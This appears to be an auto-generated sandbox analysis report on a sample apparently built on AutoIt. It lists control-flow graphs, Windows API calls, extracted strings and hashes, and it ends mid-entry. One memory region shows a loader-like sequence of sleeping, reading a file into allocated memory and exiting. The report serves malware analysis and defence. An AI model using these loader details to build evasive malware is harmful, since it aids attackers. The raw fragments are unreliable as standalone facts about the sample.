                                                                                                control_flow_graph 1954 40f5c0-40f5cf call 422240 1957 40f5d0-40f5e8 1954->1957 1957->1957 1958 40f5ea-40f613 call 413650 call 410e60 1957->1958 1963 40f614-40f633 call 414d04 1958->1963 1966 40f691 1963->1966 1967 40f635-40f63c 1963->1967 1968 40f696-40f69c 1966->1968 1969 40f660-40f674 call 4150d1 1967->1969 1970 40f63e 1967->1970 1973 40f679-40f67c 1969->1973 1972 40f640 1970->1972 1974 40f642-40f650 1972->1974 1973->1963 1975 40f652-40f655 1974->1975 1976 40f67e-40f68c 1974->1976 1977 40f65b-40f65e 1975->1977 1978 425d1e-425d3e call 4150d1 call 414d04 1975->1978 1979 40f68e-40f68f 1976->1979 1980 40f69f-40f6ad 1976->1980 1977->1969 1977->1972 1990 425d43-425d5f call 414d30 1978->1990 1979->1975 1982 40f6b4-40f6c2 1980->1982 1983 40f6af-40f6b2 1980->1983 1985 425d16 1982->1985 1986 40f6c8-40f6d6 1982->1986 1983->1975 1985->1978 1988 425d05-425d0b 1986->1988 1989 40f6dc-40f6df 1986->1989 1988->1974 1991 425d11 1988->1991 1989->1975 1990->1968 1991->1985
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: __fread_nolock_fseek_memmove_strcat
                                                                                                • String ID: AU3!$EA06
                                                                                                • API String ID: 1268643489-2658333250
                                                                                                • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                                                • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                                                                • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                                                • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
                                                                                                Function 00401100 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136windowtimeregistryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1994 401100-401111 1995 401113-401119 1994->1995 1996 401179-401180 1994->1996 1998 401144-40114a 1995->1998 1999 40111b-40111e 1995->1999 1996->1995 1997 401182 1996->1997 2002 40112c-401141 DefWindowProcW 1997->2002 2000 401184-40118e call 401250 1998->2000 2001 40114c-40114f 1998->2001 1999->1998 2003 401120-401126 1999->2003 2011 401193-40119a 2000->2011 2004 401151-401157 2001->2004 2005 40119d 2001->2005 2003->2002 2007 42b038-42b03f 2003->2007 2008 401219-40121f 2004->2008 2009 40115d 2004->2009 2012 4011a3-4011a9 2005->2012 2013 42afb4-42afc5 call 40f190 2005->2013 2007->2002 2010 42b045-42b059 call 401000 call 40e0c0 2007->2010 2008->2003 2016 401225-42b06d call 468b0e 2008->2016 2014 401163-401166 2009->2014 2015 42b01d-42b024 2009->2015 2010->2002 2012->2003 2019 4011af 2012->2019 2013->2011 2021 42afe9-42b018 call 40f190 call 401a50 2014->2021 2022 40116c-401172 2014->2022 2015->2002 2020 42b02a-42b033 call 4370f4 2015->2020 2016->2011 2019->2003 2026 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2019->2026 2027 4011db-401202 SetTimer RegisterWindowMessageW 2019->2027 2020->2002 2021->2002 2022->2003 2031 401174-42afde call 45fd57 2022->2031 2027->2011 2029 401204-401216 CreatePopupMenu 2027->2029 2031->2002 2045 42afe4 2031->2045 2045->2011
                                                                                                APIs
                                                                                                • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                                                • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                                                • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                                                • CreatePopupMenu.USER32 ref: 00401204
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                • String ID: TaskbarCreated
                                                                                                • API String ID: 129472671-2362178303
                                                                                                • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                                                • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                                                • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                                                • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E
                                                                                                Function 004115D7 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 2046 4115d7-4115df 2047 4115ee-4115f9 call 4135bb 2046->2047 2050 4115e1-4115ec call 411988 2047->2050 2051 4115fb-4115fc 2047->2051 2050->2047 2054 4115fd-41160e 2050->2054 2055 411610-41163b call 417fc0 call 41130a 2054->2055 2056 41163c-411656 call 4180af call 418105 2054->2056 2055->2056
                                                                                                APIs
                                                                                                • _malloc.LIBCMT ref: 004115F1
                                                                                                  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                • std::exception::exception.LIBCMT ref: 00411626
                                                                                                • std::exception::exception.LIBCMT ref: 00411640
                                                                                                • __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                • String ID: ,*H$4*H$@fI
                                                                                                • API String ID: 615853336-1459471987
                                                                                                • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                                • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                                                                • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                                • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D
                                                                                                Function 040D35E8 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 2065 40d35e8-40d3696 call 40d1008 2068 40d369d-40d36c3 call 40d44f8 CreateFileW 2065->2068 2071 40d36ca-40d36da 2068->2071 2072 40d36c5 2068->2072 2080 40d36dc 2071->2080 2081 40d36e1-40d36fb VirtualAlloc 2071->2081 2073 40d3815-40d3819 2072->2073 2074 40d385b-40d385e 2073->2074 2075 40d381b-40d381f 2073->2075 2077 40d3861-40d3868 2074->2077 2078 40d382b-40d382f 2075->2078 2079 40d3821-40d3824 2075->2079 2084 40d38bd-40d38d2 2077->2084 2085 40d386a-40d3875 2077->2085 2086 40d383f-40d3843 2078->2086 2087 40d3831-40d383b 2078->2087 2079->2078 2080->2073 2082 40d36fd 2081->2082 2083 40d3702-40d3719 ReadFile 2081->2083 2082->2073 2088 40d371b 2083->2088 2089 40d3720-40d3760 VirtualAlloc 2083->2089 2092 40d38d4-40d38df VirtualFree 2084->2092 2093 40d38e2-40d38ea 2084->2093 2090 40d3879-40d3885 2085->2090 2091 40d3877 2085->2091 2094 40d3845-40d384f 2086->2094 2095 40d3853 2086->2095 2087->2086 2088->2073 2096 40d3767-40d3782 call 40d4748 2089->2096 2097 40d3762 2089->2097 2098 40d3899-40d38a5 2090->2098 2099 40d3887-40d3897 2090->2099 2091->2084 2092->2093 2094->2095 2095->2074 2105 40d378d-40d3797 2096->2105 2097->2073 2102 40d38a7-40d38b0 2098->2102 2103 40d38b2-40d38b8 2098->2103 2101 40d38bb 2099->2101 2101->2077 2102->2101 2103->2101 2106 40d3799-40d37c8 call 40d4748 2105->2106 2107 40d37ca-40d37de call 40d4558 2105->2107 2106->2105 2112 40d37e0 2107->2112 2113 40d37e2-40d37e6 2107->2113 2112->2073 2115 40d37e8-40d37ec CloseHandle 2113->2115 2116 40d37f2-40d37f6 2113->2116 2115->2116 2117 40d37f8-40d3803 VirtualFree 2116->2117 2118 40d3806-40d380f 2116->2118 2117->2118 2118->2068 2118->2073
                                                                                                APIs
                                                                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 040D36B9
                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 040D38DF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2152227056.00000000040D1000.00000040.00000020.00020000.00000000.sdmp, Offset: 040D1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_40d1000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateFileFreeVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 204039940-0
                                                                                                • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                                                • Instruction ID: e3a08c2ea59228ef540b6939815ff6bf2a266e49283208694c57e5a9ed2f04b0
                                                                                                • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                                                • Instruction Fuzzy Hash: 2CA11A74E00309EBDB14CFA4C894BEEBBB5BF48704F208169E915BB280D775AA49CF55
                                                                                                Function 0040E4C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 2119 40e4c0-40e4e5 call 403350 RegOpenKeyExW 2122 427190-4271ae RegQueryValueExW 2119->2122 2123 40e4eb-40e4f0 2119->2123 2124 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 2122->2124 2125 42721a-42722a RegCloseKey 2122->2125 2130 427210-427219 call 436508 2124->2130 2131 4271f7-42720e call 402160 2124->2131 2130->2125 2131->2130
                                                                                                APIs
                                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: QueryValue$CloseOpen
                                                                                                • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                • API String ID: 1586453840-614718249
                                                                                                • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                                                • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                                                                • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                                                • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                                                                                Function 00410570 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 2136 410570-4105f1 CreateWindowExW * 2 ShowWindow * 2
                                                                                                APIs
                                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                                • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                                • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$CreateShow
                                                                                                • String ID: AutoIt v3$edit
                                                                                                • API String ID: 1584632944-3779509399
                                                                                                • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                                • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                                                                • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                                • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                                                                Function 040D33B8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 144fileCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 2137 40d33b8-40d34e5 call 40d1008 call 40d32a8 CreateFileW 2144 40d34ec-40d34fc 2137->2144 2145 40d34e7 2137->2145 2148 40d34fe 2144->2148 2149 40d3503-40d351d VirtualAlloc 2144->2149 2146 40d359c-40d35a1 2145->2146 2148->2146 2150 40d351f 2149->2150 2151 40d3521-40d3538 ReadFile 2149->2151 2150->2146 2152 40d353c-40d3576 call 40d32e8 call 40d22a8 2151->2152 2153 40d353a 2151->2153 2158 40d3578-40d358d call 40d3338 2152->2158 2159 40d3592-40d359a ExitProcess 2152->2159 2153->2146 2158->2159 2159->2146
                                                                                                APIs
                                                                                                  • Part of subcall function 040D32A8: Sleep.KERNELBASE(000001F4), ref: 040D32B9
                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 040D34DB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2152227056.00000000040D1000.00000040.00000020.00020000.00000000.sdmp, Offset: 040D1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_40d1000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateFileSleep
                                                                                                • String ID: QYUY5D46IUX0
                                                                                                • API String ID: 2694422964-1242009982
                                                                                                • Opcode ID: b26c7dc7d1bdbcca15c79cd15debbd365ff7e165cfc6215071152d4a9dcfe241
                                                                                                • Instruction ID: 2395e4802d521380aeaa7bd16a27f43b5cc58526a30aca3026a2304db918979c
                                                                                                • Opcode Fuzzy Hash: b26c7dc7d1bdbcca15c79cd15debbd365ff7e165cfc6215071152d4a9dcfe241
                                                                                                • Instruction Fuzzy Hash: 01515230D14349EBEF15DBA4C814BEFBB79AF48304F004199E609BB2C0D6796B49CB66
                                                                                                Function 00401B80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                • _wcsncpy.LIBCMT ref: 00401C41
                                                                                                • _wcscpy.LIBCMT ref: 00401C5D
                                                                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                                                                • String ID: Line:
                                                                                                • API String ID: 1874344091-1585850449
                                                                                                • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                                • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                                                                • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                                • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                                                                Function 0040F250 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                                                                • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                                                                • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Close$OpenQueryValue
                                                                                                • String ID: Control Panel\Mouse
                                                                                                • API String ID: 1607946009-824357125
                                                                                                • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                                • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                                                                • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                                • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                                                                Function 004102B0 Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                • _wcsncpy.LIBCMT ref: 004102ED
                                                                                                • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                • _wcsncpy.LIBCMT ref: 00410340
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                                                                • String ID:
                                                                                                • API String ID: 3170942423-0
                                                                                                • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                                • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                                                                • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                                • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                                                                Function 00475077 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 390COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: #v
                                                                                                • API String ID: 0-554117064
                                                                                                • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                                • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                                                                • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                                • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                                                                Function 00475300 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
